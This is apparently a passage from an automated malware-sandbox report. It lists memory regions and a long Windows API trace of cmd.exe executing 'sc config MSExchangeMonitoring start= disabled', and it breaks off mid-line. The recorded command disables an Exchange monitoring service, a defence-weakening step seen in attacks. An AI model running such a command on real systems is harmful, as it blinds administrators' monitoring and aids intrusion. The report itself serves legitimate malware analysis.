7975 start_va = 0x4b40000 end_va = 0x4c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 7976 start_va = 0x4ca0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 7977 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7978 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7979 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7980 start_va = 0x7ecf0000 end_va = 0x7edeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecf0000" filename = "" Region: id = 7981 start_va = 0x7ee19000 end_va = 0x7ee1bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee19000" filename = "" Region: id = 7982 start_va = 0x4780000 end_va = 0x4783fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 7983 start_va = 0x4790000 end_va = 0x4793fff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 7984 start_va = 0x4cb0000 end_va = 0x4fe6fff entry_point = 0x4cb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 495 os_tid = 0x168 [0131.671] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0131.671] __set_app_type (_Type=0x1) [0131.671] __p__fmode () returned 0x77ac4d6c [0131.671] __p__commode () returned 0x77ac5b1c [0131.671] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0131.671] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0131.671] GetCurrentThreadId () returned 0x168 [0131.671] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x168) returned 0x84 [0131.671] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.671] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0131.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.673] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.674] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x48ff8a8 | out: phkResult=0x48ff8a8*=0x0) returned 0x2 [0131.674] VirtualQuery (in: lpAddress=0x48ff8af, lpBuffer=0x48ff860, dwLength=0x1c | out: lpBuffer=0x48ff860*(BaseAddress=0x48ff000, AllocationBase=0x4800000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.674] VirtualQuery (in: lpAddress=0x4800000, lpBuffer=0x48ff860, dwLength=0x1c | out: lpBuffer=0x48ff860*(BaseAddress=0x4800000, AllocationBase=0x4800000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.674] VirtualQuery (in: lpAddress=0x4801000, lpBuffer=0x48ff860, dwLength=0x1c | out: lpBuffer=0x48ff860*(BaseAddress=0x4801000, AllocationBase=0x4800000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.674] VirtualQuery (in: lpAddress=0x4803000, lpBuffer=0x48ff860, dwLength=0x1c | out: lpBuffer=0x48ff860*(BaseAddress=0x4803000, AllocationBase=0x4800000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.674] VirtualQuery (in: lpAddress=0x4900000, lpBuffer=0x48ff860, dwLength=0x1c | out: lpBuffer=0x48ff860*(BaseAddress=0x4900000, AllocationBase=0x4900000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.674] GetConsoleOutputCP () returned 0x1b5 [0131.674] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.674] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0131.674] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.674] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0131.675] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.675] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.675] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.675] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.675] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.675] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.675] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.675] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0131.675] GetEnvironmentStringsW () returned 0x4987da8* [0131.675] FreeEnvironmentStringsA (penv="A") returned 1 [0131.676] GetEnvironmentStringsW () returned 0x4987da8* [0131.676] FreeEnvironmentStringsA (penv="A") returned 1 [0131.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x48fe80c | out: phkResult=0x48fe80c*=0x94) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0xb8, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x1, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0x1, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x0, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x40, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x40, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0x40, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegCloseKey (hKey=0x94) returned 0x0 [0131.676] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x48fe80c | out: phkResult=0x48fe80c*=0x94) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0x40, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x1, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0x1, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x0, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x9, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x4, lpData=0x48fe818*=0x9, lpcbData=0x48fe814*=0x4) returned 0x0 [0131.676] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48fe810, lpData=0x48fe818, lpcbData=0x48fe814*=0x1000 | out: lpType=0x48fe810*=0x0, lpData=0x48fe818*=0x9, lpcbData=0x48fe814*=0x1000) returned 0x2 [0131.676] RegCloseKey (hKey=0x94) returned 0x0 [0131.676] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29834 [0131.676] srand (_Seed=0x5ad29834) [0131.676] GetCommandLineW () returned="/c sc config MSExchangeMonitoring start= disabled" [0131.676] GetCommandLineW () returned="/c sc config MSExchangeMonitoring start= disabled" [0131.676] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.676] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4989d00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0131.677] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.677] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.677] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.677] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.677] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.677] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.677] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.677] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.677] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.677] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.677] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.677] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.677] GetEnvironmentStringsW () returned 0x4987da8* [0131.677] FreeEnvironmentStringsA (penv="A") returned 1 [0131.677] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.677] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.677] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.677] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.677] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.677] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.677] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.677] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.677] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.677] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.677] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x48ff5e4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.677] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x48ff5e4, lpFilePart=0x48ff5dc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x48ff5dc*="Desktop") returned 0x1d [0131.677] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.678] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x48ff360 | out: lpFindFileData=0x48ff360) returned 0x49805c8 [0131.678] FindClose (in: hFindFile=0x49805c8 | out: hFindFile=0x49805c8) returned 1 [0131.678] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x48ff360 | out: lpFindFileData=0x48ff360) returned 0x49805c8 [0131.678] FindClose (in: hFindFile=0x49805c8 | out: hFindFile=0x49805c8) returned 1 [0131.678] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0131.678] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x48ff360 | out: lpFindFileData=0x48ff360) returned 0x49805c8 [0131.678] FindClose (in: hFindFile=0x49805c8 | out: hFindFile=0x49805c8) returned 1 [0131.678] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.678] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0131.678] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0131.678] GetEnvironmentStringsW () returned 0x4987da8* [0131.678] FreeEnvironmentStringsA (penv="=") returned 1 [0131.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.679] GetConsoleOutputCP () returned 0x1b5 [0131.679] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.679] GetUserDefaultLCID () returned 0x409 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x48ff714, cchData=128 | out: lpLCData="0") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x48ff714, cchData=128 | out: lpLCData="0") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x48ff714, cchData=128 | out: lpLCData="1") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0131.679] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0131.679] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.680] GetConsoleTitleW (in: lpConsoleTitle=0x498aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.680] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0131.680] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0131.681] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0131.681] _wcsicmp (_String1="sc", _String2=")") returned 74 [0131.681] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0131.681] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0131.681] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0131.681] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0131.681] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0131.681] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0131.682] GetConsoleTitleW (in: lpConsoleTitle=0x48ff400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.682] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.682] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.682] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.682] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.682] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.682] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.682] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.682] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.682] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.682] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.682] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.682] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.682] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.682] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.682] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.682] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.683] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.683] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.683] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.683] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.683] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.683] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.683] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.683] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.683] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.683] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.683] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.683] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.683] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.683] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.683] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.683] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.683] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.683] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.683] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.683] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.683] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.683] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.683] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.683] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.683] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.683] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.683] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.683] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.684] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.684] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.684] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.684] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.684] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.684] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.684] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.684] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.684] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.684] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.684] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.684] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.684] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.684] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0131.684] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0131.684] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0131.684] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0131.684] SetErrorMode (uMode=0x0) returned 0x0 [0131.684] SetErrorMode (uMode=0x1) returned 0x0 [0131.684] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x49805d0, lpFilePart=0x48fef0c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x48fef0c*="Desktop") returned 0x1d [0131.684] SetErrorMode (uMode=0x0) returned 0x1 [0131.684] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.684] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.692] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.692] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.692] GetConsoleTitleW (in: lpConsoleTitle=0x48ff18c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.692] InitializeProcThreadAttributeList (in: lpAttributeList=0x48ff0b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x48ff09c | out: lpAttributeList=0x48ff0b8, lpSize=0x48ff09c) returned 1 [0131.692] UpdateProcThreadAttribute (in: lpAttributeList=0x48ff0b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x48ff0a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x48ff0b8, lpPreviousValue=0x0) returned 1 [0131.692] GetStartupInfoW (in: lpStartupInfo=0x48ff0f0 | out: lpStartupInfo=0x48ff0f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.692] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0131.693] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.693] _wcsnicmp 